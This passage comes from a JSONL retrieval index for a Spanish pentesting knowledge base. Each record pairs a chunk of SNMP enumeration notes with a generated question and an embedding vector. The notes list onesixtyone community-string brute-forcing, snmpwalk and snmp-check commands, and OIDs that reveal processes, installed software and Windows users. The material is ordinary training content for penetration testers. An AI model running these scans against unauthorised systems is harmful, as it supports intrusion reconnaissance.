0.04867, 0.0904, 0.06473, 0.06608, -0.05054, 0.01631, 0.06187, -0.0698, -0.04616, -0.02672, -0.01012, -0.11077, 0.04802, -0.06572, -0.05246, 0.06656, 0.03113, 0.01039, -0.01567, -0.09593, 0.02325, -0.02438, 0.0056, -0.00729, 0.01548, -0.01527, -0.03069, 0.02523, 0.00438, -0.03165, -0.06447, -0.01862, 0.00652, -0.0778, 0.01635, -0.01299, -0.00891, -0.02589, 0.01829, 0.05352, -0.0794, 0.00333, -0.01903, 0.06861, 0.02564, -0.03406, 0.04503, -0.05906, -0.03099, -0.03465, -0.03853, 0.02918, -0.03024, -0.05528, 0.00609, -0.01139, 0.04375, 0.06394, -0.01884, -0.04999, 0.02789, 0.05269, 0.00524, 0.01505, 0.00613, -0.01329, -0.0053, -0.03225, 0.02814, -0.02942, -0.04966, -0.03251, 0.0127, -0.05274, -0.01175, 0.057, -0.00298, -0.06451, -0.01089, 0.01052, -0.01152, -0.00091, -0.01615, 0.07093, -0.05099, 0.03131, 0.01749, -0.02929, -0.00021, -0.01788]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# SNMP\n\n> Puerto **UDP 161** (Simple Network Management Protocol). RecuΓ©rdalo: es **UDP** (`nmap -sU`), no TCP. Parte de Puertos olvidados.", "indexar": "que puerto usa el protocolo SNMP para la gestiΓ³n de redes?", "v": [-0.08041, -0.14923, -0.12264, -0.26226, -0.0786, -0.09577, -0.02571, -0.19604, -0.15012, -0.01694, -0.0362, 0.07551, 0.19496, -0.16123, -0.09921, -0.00133, -0.07341, 0.05378, 0.21547, -0.02548, -0.16612, 0.04373, 0.01297, -0.07287, 0.07456, 0.04128, 0.09167, -0.00783, -0.06504, -0.02886, -0.0009, -0.00843, 0.00742, -0.01747, -0.00258, -0.00963, 0.03359, 0.12242, 0.01709, 0.12958, -0.04902, -0.03449, -0.13654, -0.02591, 0.14219, -0.06045, -0.00821, -0.08622, 0.00925, -0.01047, -0.04726, 0.05143, -0.11783, 0.03855, -0.11544, 0.11067, -0.00602, -0.03121, -0.05295, 0.01912, 0.02045, -0.08334, 0.04609, -0.05084, -0.03799, -0.09264, 0.02837, 0.03144, -0.07786, 0.02827, 0.03275, 0.0129, 0.08804, 0.02879, 0.07619, 0.01849, -0.0311, 0.06447, 0.11301, 0.07839, -0.00773, 0.00763, -0.04352, 0.04729, -0.08277, -0.00957, -0.02992, -0.00794, 0.04784, -0.05725, -0.03889, -0.0487, -0.10304, -0.03791, 0.06906, -0.06199, -0.03992, -0.01769, 0.08293, 0.00927, 0.04286, 0.0617, -0.06184, -0.01344, -0.00344, 0.07387, 0.02082, -0.05281, 0.10444, -0.04206, -0.02249, 0.00409, 0.00555, -0.03069, -0.08229, 0.02247, -0.04061, -0.03598, -0.025, 0.02814, -0.02434, -0.04851, -0.06949, -0.0025, 0.0394, 0.02044, 0.00674, 0.12978, 0.13245, -0.00556, -0.02785, -0.03791, -0.08746, -0.03805, -0.01238, -0.04244, -0.06872, -0.0326, -0.08418, -0.0587, -0.1435, 0.03605, -0.09057, -0.03091, 0.07029, 0.0048, 0.00697, -0.10885, -0.08188, 0.09183, 0.04927, 0.05743, -0.10566, -0.02415, -0.05877, 0.07944, -0.01443, -0.06267, -0.07777, 0.01446, -0.04819, 0.00671, 0.01567, 0.03634, 0.01052, 0.05556, -0.08671, 0.0092, 0.03781, -0.04949, 0.00226, 0.07832, -0.10312, 0.01624, 0.00628, 0.00512, -0.0768, -0.05265, 0.00515, 0.02305, -0.07098, 0.01693, -0.01806, 0.0065, -0.01024, -0.05798, 0.01633, -0.01208, 0.00067, 0.03898, 0.00226, -0.02143, 0.04228, 0.07079, 0.03084, -0.00578, 0.01234, 0.02602, -0.0152, -0.01567, -0.00027, 0.00831, 0.02451, -0.03351, 0.0131, 0.05835, -0.07034, -0.01227, -0.00877, 0.09383, -0.01038, -0.03411, 0.04255, -0.03773, -0.02411, -0.01988, -0.01423, 0.01886, 0.05689, -0.00718, 0.01975, 0.03688, -0.01364, 0.00795, -0.03643, -0.02521, -0.07523, 0.02706, 0.03042, -0.0438, 0.00904, -0.02002, -0.01561, -0.01693, 0.03211, 0.01908, -0.06037, -0.03102, -0.03773, -0.03929, -0.01191, -0.01754, -0.07751, 0.00336, 0.03369, -0.00833, -0.08987, 0.02056, 0.01807, -0.02014, -0.02091, -0.00939, 0.0428, 0.00847, 0.00395, -0.05158]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# SNMP\n\n> Puerto **UDP 161** (Simple Network Management Protocol). RecuΓ©rdalo: es **UDP** (`nmap -sU`), no TCP. Parte de Puertos olvidados.", "indexar": "ΒΏes necesario usar UDP o TCP cuando se configura un servidor de gestiΓ³n con SNMP?", "v": [-0.15142, -0.05401, -0.16758, -0.20616, 0.03887, -0.1066, -0.05097, -0.04732, -0.03362, 0.08118, -0.17743, 0.01182, 0.05678, -0.15659, -0.20231, -0.02537, 0.05712, -0.12791, 0.10465, 0.03379, -0.00055, 0.02828, 0.07638, 0.00074, -0.03378, 0.07377, 0.05215, -0.11454, -0.08237, -0.11673, 0.02775, 0.03818, -0.06831, -0.01495, 0.00197, 0.01372, -0.07418, 0.0846, 0.01634, 0.11163, 0.07403, -0.06577, -0.0802, 0.0366, 0.125, 0.0721, 0.0419, -0.05382, 0.02957, -0.00412, -0.12482, 0.01367, -0.14109, -0.01927, -0.0855, 0.07144, 0.07031, -0.04728, 0.08233, -0.02857, -0.11654, 0.04384, -0.09757, -0.0351, 0.01041, -0.09515, -0.07839, -0.08787, -0.08256, 0.03338, -0.10298, 0.00263, -0.02755, -0.07297, 0.121, 0.03327, -0.0045, -0.01935, 0.17531, 0.06329, 0.05299, -0.019, -0.16237, 0.09393, -0.13506, -0.07146, 0.12069, 0.02622, -0.0057, 0.0177, 0.00556, 0.01465, -0.01441, 0.03571, 0.05657, -0.09138, 0.00811, 0.00778, 0.01878, 0.04407, 0.05322, 0.08048, -0.04395, 0.03121, -0.03374, 0.0771, 0.18205, -0.07765, 0.06624, -0.04478, -0.00877, 0.02574, -0.10713, -0.0226, -0.03031, -0.10171, 0.02353, 0.01866, 0.02781, -0.05897, -0.05951, -0.01796, 0.04013, -0.01452, 0.0495, 0.03385, 0.08026, 0.00966, 0.00457, 0.03044, -0.02239, -0.06516, -0.09783, -0.02227, -0.06931, -0.01721, 0.01576, -0.01779, -0.03878, -0.05135, -0.03865, 0.03508, -0.02274, -0.03414, 0.08639, -0.00532, 0.0022, -0.06379, -0.00786, 0.07577, 0.09115, -0.10122, -0.03624, -0.02572, -0.03681, -0.00949, -0.02602, -0.09188, -0.09461, 0.04467, -0.05385, -0.03087, 0.04112, 0.06669, 0.0763, -0.04014, -0.00477, 0.11137, 0.02514, -0.02615, 0.01438, -0.01418, 0.01244, -0.01284, -0.00097, -0.1029, -0.0584, -0.07464, 0.0389, 0.04225, -0.02385, -0.04619, -0.01615, 0.03823, 0.00677, -0.00506, 0.01803, -0.02166, 0.00494, -0.02586, 0.00742, 0.02899, 0.02591, 0.01347, 0.03613, -0.06394, 0.04679, -0.03106, -0.01341, -0.00013, -0.00829, -0.0481, -0.02714, -0.07685, 0.01104, -0.00671, -0.06744, 0.09306, 0.01107, 0.0182, 0.01417, -0.02743, 0.09277, -0.00933, -0.01739, 0.0158, 0.00035, 0.05586, 0.02826, -0.04847, 0.00491, -0.01555, 0.00698, -0.01407, -0.00913, -0.02992, -0.01049, -0.00422, 0.08095, -0.01168, -0.01426, 0.04937, 0.0161, -0.02483, 0.00257, -0.02067, -0.00665, -0.02116, -0.02651, -0.02971, 0.01358, 0.03354, 0.01481, -0.00721, 0.02117, -0.02327, -0.05529, -0.00927, -0.01363, -0.02619, 0.05389, -0.05135, -0.00084, -0.02779, -0.03171, 0.01915]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# SNMP\n\n> Puerto **UDP 161** (Simple Network Management Protocol). RecuΓ©rdalo: es **UDP** (`nmap -sU`), no TCP. Parte de Puertos olvidados.", "indexar": "con quΓ© herramienta puedo verificar si estoy usando el puerto correcto para SNMP?", "v": [-0.12312, 0.1149, -0.31337, -0.11312, -0.04335, -0.1349, -0.04626, -0.16456, -0.16251, -0.13332, -0.11075, 0.06579, 0.06741, -0.14377, -0.03938, 0.06464, -0.01866, -0.10797, 0.09909, 0.06349, -0.04517, -0.11636, -0.03186, -0.14329, -0.00707, 0.08491, -0.02973, 0.03565, -0.14741, -0.0577, -0.00125, 0.05392, 0.01024, -0.01485, -0.08669, -0.01653, 0.03951, 0.06185, 0.07466, 0.13665, 0.01644, 0.04067, -0.01505, -0.00923, 0.07441, 0.02727, -0.01193, -0.09065, -0.0547, 0.04462, -0.00108, -0.00915, -0.11536, 0.02263, -0.13389, -0.07182, 0.12035, -0.0144, 0.06061, -0.10677, -0.02701, -0.01247, -0.01828, -0.04114, -0.05433, -0.05418, 0.03766, -0.00966, -0.06301, 0.0028, -0.07182, 0.00634, 0.07632, 0.01683, -0.03093, -0.0112, 0.04355, 0.02554, 0.17199, 0.02965, 0.03231, 0.03334, -0.04898, -0.03484, -0.05854, -0.1204, 0.00647, -0.06872, 0.02676, -0.15511, -0.03155, 0.05537, 0.01158, 0.05078, 0.00566, -0.02294, 0.00735, -0.02533, 0.00771, -0.00528, 0.19274, -0.00095, -0.08425, -0.01277, -0.02448, -0.02062, -0.01406, -0.04914, -0.01315, -0.03132, 0.04811, -0.0005, -0.04383, -0.0651, 0.00506, 0.02298, -0.05351, -0.1531, -0.03066, -0.04652, 0.04786, 0.00424, -0.13377, -0.0084, 0.02933, -0.01929, 0.04295, 0.11375, 0.04825, -0.0247, 0.01007, -0.08245, -0.08992, -0.04825, -0.01765, -0.05894, 0.00142, -0.09865, 0.00141, -0.03386, -0.04142, 0.03097, -0.00441, -0.07236, 0.05214, 0.04483, -0.05606, -0.05241, -0.07161, 0.0182, 0.06654, -0.05025, -0.02595, 0.05978, -0.01633, 0.01881, 0.05938, -0.03589, -0.05548, 0.01648, -0.06463, -0.03948, 0.03079, 0.01936, 0.02561, -0.03921, 0.00141, 0.04123, 0.06105, -0.01995, 0.00452, 0.04759, 0.00379, -0.04638, 0.04834, -0.06358, -0.08168, 0.03106, -0.01511, -0.06083, -0.10108, 0.0315, -0.05632, -0.05063, -0.03482, -0.03792, 0.03896, -0.03741, 0.05216, 0.04484, 0.01582, 0.04214, 0.05885, -0.03419, 0.0413, 0.05189, 0.02088, -0.02256, -0.00068, -0.03834, -0.01303, 0.04253, -0.01078, -0.0741, 0.09147, 0.05576, -0.06057, 0.01698, 0.01479, 0.0233, 0.02742, -0.01805, 0.07628, -0.07702, -0.03278, -0.02082, -0.01972, 0.08192, -0.01197, 0.02296, 0.01163, 0.02492, 0.02522, 0.00104, -0.03045, 0.02635, 0.01284, 0.0371, 0.02652, 0.05303, 0.00567, 0.02768, -0.04108, -0.02925, 0.05844, -0.00034, 0.01243, 0.02298, -0.03429, -0.03524, 0.02861, 0.01011, -0.04157, -0.04206, -0.00199, 0.03237, -0.0438, -0.01473, -0.02781, -0.05961, -0.00959, 0.0378, 0.07046, -0.08634, 0.01189, -0.03192]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Herramientas\n```bash\nonesixtyone -c comm.txt IP/24 # descubre SNMP + fuerza community a la vez\nsnmpwalk -v2c -c public IP OID # recorre el Γ‘rbol de OIDs\nsnmp-check IP -c public # enumeraciΓ³n bonita y ordenada\nsnmpwalk -v2c -c public -Oa IP OID # -Oa = traduce hex a ASCII\n```", "indexar": "quΓ© herramienta sirve para descubrir el community SNMP de un equipo?", "v": [-0.06552, -0.00211, -0.19157, -0.20106, -0.08213, -0.24457, -0.22287, -0.07481, -0.00629, -0.06997, -0.1106, -0.0029, 0.05445, -0.10632, -0.01598, 0.17316, 0.07955, -0.13589, 0.08417, 0.0959, -0.03683, 0.02001, -0.03028, -0.08699, 0.0231, -0.03596, 0.03887, 0.03194, -0.12541, 0.0316, 0.00658, 0.08426, -0.03355, -0.05219, -0.05644, -0.07381, 0.0315, 0.0327, -0.01689, 0.00735, -0.02662, -0.07194, -0.09031, -0.04616, 0.02778, 0.04881, -0.04142, -0.01939, -0.02468, 0.08052, -0.10915, -0.00347, -0.06073, -0.0467, -0.0668, -0.05576, 0.07715, -0.1226, -0.00764, -0.10387, -0.12262, -0.04979, -0.1202, -0.12554, -0.01349, -0.10884, -0.06004, -0.03287, -0.0261, 0.00052, -0.07295, -0.06235, 0.12799, -0.03209, -0.13645, 0.00802, 0.07124, 0.04256, 0.11894, -0.02598, 0.15455, 0.08044, -0.10391, -0.04726, 0.01134, -0.07004, 0.14188, 0.00895, 0.02922, -0.08466, 0.02645, 0.12303, -0.04126, 0.04369, 0.02146, -0.03953, 0.11156, -0.06286, 0.04007, 0.01952, 0.10443, -0.05379, -0.10533, -0.0071, -0.03449, 0.0136, 0.06134, 0.02203, -0.0306, -0.02951, 0.09652, -0.05692, -0.00601, 0.06115, 0.00749, 0.02537, -0.03877, -0.01634, -0.01286, -0.00795, 0.03233, 0.01899, -0.06905, -0.07507, -0.02749, -0.02919, 0.02451, -0.00557, 0.05491, -0.03794, -0.02682, -0.01883, -0.08727, 0.06551, -0.07754, -0.01435, 0.03263, -0.06351, -0.03678, -0.03294, 0.03194, 0.00678, -0.00306, -0.11986, 0.02053, -0.01035, 0.01237, -0.08497, 0.03422, 0.02771, 0.05018, -0.04035, -0.06959, -0.01206, 0.0022, -0.02281, 0.03897, -0.0137, -0.10504, 0.02872, -0.0626, -0.1007, 0.11118, 0.00287, 0.04093, -0.07403, 0.02817, -0.02511, 0.1007, -0.02065, 0.02043, -0.03165, 0.07416, -0.04794, 0.05586, -0.07289, -0.04232, -0.03028, 0.00976, -0.00267, -0.06638, 0.00026, -0.03318, 0.03273, 0.0248, -0.00276, -0.01466, -0.04663, -0.00177, -0.01655, -0.04321, 0.03263, 0.0648, -0.06654, 0.00804, -0.01009, 0.02556, -0.05716, 0.0146, 0.00202, -0.01637, 0.05821, -0.02583, 0.04305, 0.00244, 0.05926, -0.02562, -0.01134, -0.00497, 0.06541, 0.05905, -0.0147, 0.02948, 0.02337, -0.00537, -0.04256, -0.00807, 0.06012, 0.01336, 0.07013, 0.07194, 0.02721, 0.06924, -0.03108, 0.00916, -0.01068, -0.01929, 0.02842, -0.00147, -0.05841, 0.05277, -0.00569, 0.01175, 0.01501, 0.0362, -0.03936, 0.00524, 0.00593, -0.04053, -0.00808, 0.01732, -0.0009, -0.03889, -0.01771, -0.04338, 0.0027, 0.01874, -0.02085, -0.01529, -0.05065, -0.01142, 0.02485, 0.06025, -0.03844, 0.03115, 0.01264]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Herramientas\n```bash\nonesixtyone -c comm.txt IP/24 # descubre SNMP + fuerza community a la vez\nsnmpwalk -v2c -c public IP OID # recorre el Γ‘rbol de OIDs\nsnmp-check IP -c public # enumeraciΓ³n bonita y ordenada\nsnmpwalk -v2c -c public -Oa IP OID # -Oa = traduce hex a ASCII\n```", "indexar": "con quΓ© puedo hacer una enumeraciΓ³n bonita y ordenada del Γ‘rbol de OIDs?", "v": [-0.0326, 0.03186, -0.08833, 0.15949, 0.03664, 0.07933, -0.01027, 0.00799, -0.11353, -0.18539, -0.08298, -0.10226, 0.06818, -0.04021, 0.05567, -0.03108, 0.17483, -0.02094, -0.00738, 0.04504, -0.0232, 0.05151, -0.03161, 0.11399, 0.01523, -0.08531, 0.09913, 0.09372, -0.10647, 0.1084, -0.02237, 0.07451, 0.10278, 0.02146, -0.11096, 0.05339, -0.07908, 0.05635, -0.09946, -0.09138, -0.17582, 0.1054, 0.02018, 0.13443, 0.01051, 0.03553, -0.08746, 0.1499, -0.05564, -0.04879, -0.12265, -0.05589, -0.1045, -0.17902, -0.016, -0.05628, 0.03021, -0.04098, 0.11101, 0.02326, 0.02878, 0.05204, 0.03674, -0.02043, -0.00469, -0.02146, -0.02339, 0.12869, 0.14052, -0.10742, 0.0732, -0.10977, -0.05303, -0.06883, 0.08004, 0.02424, 0.01715, -0.05291, 0.00399, 0.1131, -0.02848, -0.10161, 0.00724, 0.03535, 0.02666, 0.03655, -0.02478, 0.01088, -0.03138, -0.10092, -0.07638, -0.00047, 0.00047, 0.05436, -0.01437, -0.02114, -0.04908, 0.04393, 0.05966, 0.04593, 0.01157, -0.04824, -0.03678, 0.10268, -0.03119, 0.0262, -0.04839, 0.05787, 0.01776, 0.07213, 0.0255, -0.03146, 0.04942, 0.02984, -0.04712, -0.04236, -0.13666, -0.12975, -0.00472, 0.02249, -0.01469, 0.08657, 0.00947, 0.06433, 0.01906, -0.0015, 0.03237, 0.19294, 0.0063, -0.06229, -0.02997, -0.00629, -0.06059, -0.11349, -0.12231, -0.02599, 0.01896, -0.12164, 0.03094, 0.03696, 0.00182, 0.0548, -0.04637, 0.01644, 0.03531, -0.01215, 0.03075, -0.00097, -0.03571, -0.05336, 0.02735, 0.06233, 0.09823, 0.06831, 0.08969, -0.01563, 0.01708, -0.03676, 0.01634, 0.03985, -0.06632, 0.00045, -0.00054, 0.05982, 0.06572, 0.00924, 0.02669, 0.04602, 0.0835, -0.03842, -0.04681, -0.00392, -0.07306, 0.0145, 0.04737, -0.03825, -0.03886, 0.0213, -0.00805, 0.03788, -0.05423, -0.01586, -0.01925, -0.03806, -0.04322, -0.01864, 0.01458, -0.00689, 0.00712, 0.02752, 0.01901, 0.09569, -0.0213, -0.025, 0.01025, -0.06299, 0.00908, 0.0391, -0.01845, -0.01349, 0.0047, -0.0402, -0.02822, 0.00704, 0.12, -0.0097, -0.01211, 0.0304, -0.0129, 0.09743, 0.04509, -0.00158, 0.06522, 0.0393, -0.0024, -0.03309, 0.00835, -0.01745, -0.08228, -0.00784, 0.02719, 0.05582, 0.07956, 0.0342, 0.00221, 0.1014, -0.02512, 0.06146, 0.0059, 0.07437, -0.08977, -0.01134, 0.0217, -0.01971, 0.04736, 0.0092, -0.00316, 0.01182, -0.06531, 0.00205, 0.02872, 0.00826, -0.01623, 0.01267, -0.03136, -0.03118, -0.0754, 0.02522, 0.01409, -0.06276, -0.03845, -0.02614, 0.02987, -0.04633, -0.00979, -0.05717]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Herramientas\n```bash\nonesixtyone -c comm.txt IP/24 # descubre SNMP + fuerza community a la vez\nsnmpwalk -v2c -c public IP OID # recorre el Γ‘rbol de OIDs\nsnmp-check IP -c public # enumeraciΓ³n bonita y ordenada\nsnmpwalk -v2c -c public -Oa IP OID # -Oa = traduce hex a ASCII\n```", "indexar": "hay alguna alternativa libre a snmpwalk que traduzca los datos en texto?", "v": [-0.08325, 0.01233, -0.18638, -0.12761, -0.10367, -0.05063, -0.12239, -0.12279, -0.08936, 0.11365, -0.13432, -0.23249, 0.03029, -0.05308, -0.03574, -0.02105, 0.091, -0.03976, 0.16301, -0.02006, -0.02451, -0.1406, -0.11382, -0.10039, -0.0486, -0.18308, -0.04212, 0.02937, -0.06417, 0.04366, 0.01572, 0.01802, 0.0168, -0.01771, -0.00382, 0.08373, 0.11687, 0.10865, 0.1574, -0.14156, 0.04585, 0.00034, -0.10017, 0.03446, -0.06699, -0.1172, -0.12344, -0.00036, -0.08102, -0.05076, 0.00245, 0.06309, -0.0876, -0.00798, -0.07488, 0.04719, 0.1785, -0.04089, -0.00529, 0.03204, 0.00481, 0.15765, 0.01928, -0.06798, 0.08147, 0.03711, 0.02081, -0.06221, -0.02747, 0.12175, 0.04093, 0.08405, 0.04674, -0.03676, -0.0402, 0.01346, -0.06497, -0.05835, 0.02927, 0.07054, -0.00437, -0.09088, -0.00717, -1e-05, 0.01467, -0.00102, 0.07317, -0.09088, 0.02368, 0.06775, 0.07087, 0.0418, -0.01568, 0.09968, -0.06498, 0.00827, -0.03411, -0.0331, 0.01036, 0.09254, 0.04928, 0.02372, -0.05032, -0.01927, -0.04005, 0.03922, 0.02969, 0.04487, -0.05676, 0.01203, 0.01714, 0.05044, -0.02966, 0.02161, 0.02919, 0.01535, 0.01927, -0.00948, 0.03448, -0.00227, -0.03184, -0.07843, -0.00528, -0.06158, 0.01789, 0.01992, 0.04144, 0.02338, 0.02903, 0.05762, 0.01403, -0.04491, -0.08446, -0.14686, -0.04526, 0.043, 0.00029, 0.0182, 0.10631, 0.00961, -0.07214, 0.01358, -0.07171, 0.06781, 0.00144, -0.05672, 0.06482, -0.01233, -0.00988, -0.06718, -0.04227, 0.00047, 0.01494, 0.13627, -0.00299, 0.05094, 0.01163, -0.05347, -0.1122, 0.1008, 0.01449, -0.02003, -0.0334, 0.05138, 0.03178, 0.01711, -0.00778, -0.06085, -0.0286, 0.02713, -0.03608, 0.08388, 0.10754, -0.0926, 0.10901, -0.0154, -0.03223, -0.0535, -0.02388, 0.00707, 0.05775, -0.03277, -0.04179, -0.06829, 0.02357, -0.04973, 0.00708, 0.00795, -0.05675, -0.01747, -0.01311, 0.06083, -0.02936, -0.07298, -0.02871, -0.03952, 0.01542, -0.01234, 0.04804, -0.0329, -0.08867, -0.04221, -0.01086, 0.00687, 0.00163, 0.02947, -0.00312, 0.02211, 0.0216, 0.03585, 0.00793, -0.00669, 0.03544, -0.00511, -0.04586, -0.02366, 0.02063, 0.02301, 0.01168, -0.01761, -0.01516, 0.05831, 0.06572, -0.00522, -0.03981, 0.02459, 0.05453, 0.01626, -0.01151, 0.02934, -0.02454, -0.01021, 0.01478, 0.06405, 0.02104, -0.03475, -0.02665, -0.01445, -0.02022, -0.0752, 0.04812, 0.06029, -0.05714, -0.07212, -0.02242, 0.00695, -0.11839, 0.02627, -0.04026, -0.07, 0.01627, -0.06667, -9e-05, -0.04052, 0.00343, 0.00478]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## OIDs ΓΊtiles (numΓ©ricos, no dependen de MIBs instalados)\n```\n1.3.6.1.2.1.25.4.2.1.2 Procesos en ejecuciΓ³n (hrSWRunName)\n1.3.6.1.2.1.25.6.3.1.2 Software instalado\n1.3.6.1.2.1.2.2.1.2 Nombres de interfaces de red (ifDescr)\n1.3.6.1.4.1.77.1.2.25 Usuarios Windows\n```\n- OID = direcciΓ³n jerΓ‘rquica: `iso(1).org(3).dod(6).internet(1)...`\n- Prefijo `1.3.6.1.2.1` (mib-2) es fijo; cambian los nΓΊmeros del final.\n\nRelacionado: Nmap Β· SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "que programa puedo usar para ver quΓ© procesos estΓ‘n ejecutΓ‘ndose en un servidor sin necesidad de instalar librerΓ­as locales?", "v": [-0.04493, 0.11773, -0.20261, -0.14901, 0.059, -0.09057, 0.06618, -0.13679, -0.03996, -0.11938, -0.16769, 0.00959, -0.02654, -0.07378, 0.00306, 0.04541, 0.10871, -0.107, 0.03046, 0.04572, -0.05659, -0.02372, -0.04578, -0.00617, -0.03047, 0.11268, 0.05771, -0.1036, -0.08621, -0.04586, 0.01404, 0.04199, 0.07404, -0.08138, 0.02623, -0.07747, -0.06082, 0.04877, -0.07338, 0.03606, 0.10744, 0.0529, -0.05019, 0.02895, -0.00519, -0.03308, 0.0486, -0.08398, -0.02338, -0.04489, -0.02458, -0.01021, -0.08179, -0.01787, 0.06155, -0.06852, 0.08947, -0.15775, 0.06692, 0.01029, -0.13891, 0.05266, 0.02951, 0.00433, 0.13571, 0.0206, -0.01281, 0.00518, -0.07383, 0.01112, -0.14162, 0.02226, -0.00238, -0.03631, -0.00832, 0.09389, -0.07747, -0.01924, 0.10556, 0.0245, 0.04164, -0.01188, 0.03525, 0.0659, -0.10434, -0.07312, 0.00901, -0.05383, 0.08279, -0.04876, 0.0276, 0.02198, -0.04874, 0.03634, 0.1016, -0.12742, 0.13161, 0.00529, 0.05836, 0.11884, 0.05405, -0.05793, -0.04618, 0.103, 0.00499, 0.0054, 0.09559, -0.06621, 0.04551, -0.07476, 0.04924, -0.00702, -0.02997, -0.00279, -0.09342, -0.0477, 0.05147, -0.02618, 0.02537, 0.03813, -0.11702, -0.04146, -0.02973, -0.01597, 0.05179, -0.06746, 0.02145, 0.07458, -0.01714, 0.02162, 0.004, -0.05287, -0.01336, -0.02003, -0.09122, -0.01409, 0.06768, -0.06371, -0.03626, -0.06849, 0.01654, 0.03432, -0.03058, 0.00926, 0.07117, 0.02347, 0.02585, -0.06232, -0.05752, -0.00597, 0.03458, -0.03572, -0.04138, 0.0741, -0.10212, -0.032, 0.08496, -0.09013, 0.00033, 0.03539, 0.01052, 0.01923, -0.00214, 0.04332, 0.008, -0.05383, -0.0186, 0.04458, 0.10343, 0.10556, -0.0424, 0.0576, -0.03995, -0.06055, 0.02276, -0.04878, -0.02572, -0.07863, 0.04487, 0.00581, -0.07751, 0.06632, 0.03394, 0.0227, -0.07295, -0.05965, -0.03526, -0.03511, -0.00036, 0.04701, 0.0323, 0.04606, -0.05877, -0.01329, -0.01025, -0.03693, -0.04119, -0.01026, -0.0033, -0.08824, -0.09201, 0.01601, -0.05121, -0.01156, 0.11111, 0.04255, -0.09393, 0.10254, -0.04654, 0.1092, 0.00468, -0.03962, 0.07531, -0.00099, -0.04343, -0.06793, 0.01937, -0.03213, 0.04838, -0.00055, 0.02565, 0.01148, 0.06412, 0.01217, 0.03192, -0.0528, 0.05398, 0.01201, 0.05914, 0.06443, -0.0772, 0.03053, -0.04826, -0.05446, 0.03169, 0.00927, 0.05886, -0.04515, -0.05737, -0.1045, 0.02716, 0.13455, -0.04822, -0.0644, -0.02601, -0.04927, -0.10971, -0.00121, 0.02387, -0.04892, -0.0342, 0.04704, 0.05408, -0.04592, 0.02405, -0.00938]} -{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## OIDs ΓΊtiles (numΓ©ricos, no dependen de MIBs instalados)\n```\n1.3.6.1.2.1.25.4.2.1.2 Procesos en ejecuciΓ³n (hrSWRunName)\n1.3.6.1.2.1.25.6.3.1.2 Software instalado\n1.3.6.1.2.1.2.2.1.2 Nombres de interfaces de red (ifDescr)\n1.3.6.1.4.1.77.1.2.25 Usuarios Windows\n```\n- OID = direcciΓ³n jerΓ‘rquica: `iso(1).org(3).dod(6).internet(1)...`\n- Prefijo `1.3.6.1.2.1` (mib-2) es fijo; cambian los nΓΊmeros del final.\n\nRelacionado: Nmap Β· SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "cual es una herramienta que me permita listar el software instalado directamente consultando los OIDs numΓ©ricos?", "v": [-0.07277, 0.12059, -0.15389, -0.09873, 0.06536, -0.17958, -0.05962, -0.04621, -0.14132, -0.13254, -0.06973, -0.13575, 0.02407, -0.17492, 0.08623, 0.02058, 0.02277, -0.12632, 0.02555, 0.00604, -0.02123, -0.00319, -0.1564, -0.03388, -0.08163, 0.04719, -0.02108, -0.08276, -0.19963, -0.01304, 0.01782, 0.00823, -0.00172, -0.04278, -0.11926, 0.00251, 0.04773, 0.03163, -0.00151, 0.09018, -0.02984, 0.06744, 0.00439, 0.08259, 0.06303, -0.03667, -0.0323, 0.09386, 0.10312, 0.03812, -0.03154, -0.15406, -0.13742, -0.06634, 0.01411, -0.2046, 0.21561, -0.04643, 0.04092, -0.06271, -0.04876, 0.02386, 0.05247, -0.00491, -0.00512, -0.00292, 0.08568, -0.08406, -0.036, -0.0353, 0.01158, 0.04267, -0.00321, 0.02091, -0.02308, -0.01544, 0.02474, 0.01819, 0.0832, -0.04479, 0.07874, -0.06454, 0.04121, 0.00152, -0.03885, -0.11332, 0.05491, 0.03785, -0.0189, -0.01144, -0.06552, 0.01622, -0.01026, 0.06015, 0.01093, -0.05811, 0.10725, 0.03566, 0.01255, 0.02757, 0.06633, -0.02669, -0.10831, 0.07245, -0.03148, -0.04812, -0.01483, -0.07804, -0.10473, 0.03667, 0.06158, 0.05846, 0.05131, 0.03162, 0.04172, 0.00471, 0.01636, -0.07722, -0.04187, -0.11657, 0.02342, 0.06019, -0.03669, -0.06482, 0.02515, -0.00791, 0.00164, 0.14508, -0.04678, -0.03139, -0.02163, -0.08337, -0.03576, -0.02937, -0.05226, -0.00977, 0.04601, -0.1238, 0.10713, 0.01065, 0.01682, 0.03672, 0.0411, -0.01731, 0.08246, 0.01402, -0.07245, -0.00311, -0.01306, 0.01457, -0.00341, 0.01913, 0.03008, 0.08342, -0.09989, 0.04144, 0.04627, 0.01651, -0.07352, 0.02358, -0.08925, 0.00887, 0.0573, -0.01671, -0.00561, -0.05294, -0.01181, 0.02585, 0.0717, 0.04098, 0.02536, 0.02886, -0.00892, -0.0685, 0.00667, -0.04111, -0.02161, 0.0158, -0.02343, -0.09002, -0.09762, 0.01926, 0.00309, -0.01576, -0.03912, -0.03387, -0.03078, -0.01975, 0.00325, 0.03106, 